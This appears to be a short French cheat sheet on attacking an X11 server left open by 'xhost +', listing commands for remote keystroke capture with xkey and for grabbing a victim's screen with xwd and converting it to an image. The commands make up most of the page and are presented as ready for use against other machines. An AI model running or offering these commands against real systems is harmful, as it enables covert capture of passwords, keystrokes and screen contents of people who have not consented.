Attaque de serveur X11 sans authentification (après xhost +)

Voici quelques commandes pour exploiter un serveur X11 ouvert:

Capture de clés à distance (remote key capture)
$ xkey IP:0.0

NB:

• Le code source pour xkey.c peut être trouvé ici
• Utiliser 0.0 pour le port 6000, 1.0 pour le port 6001...

 
Capture de l'écran (screen capture):
$ xwd -display IP:0.0 -root -silent -out /tmp/screendump
$ xv /tmp/screendump 
$ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


Références:

• Hack computer: X11 (6000 TCP) 
• Hacking Linux Exposed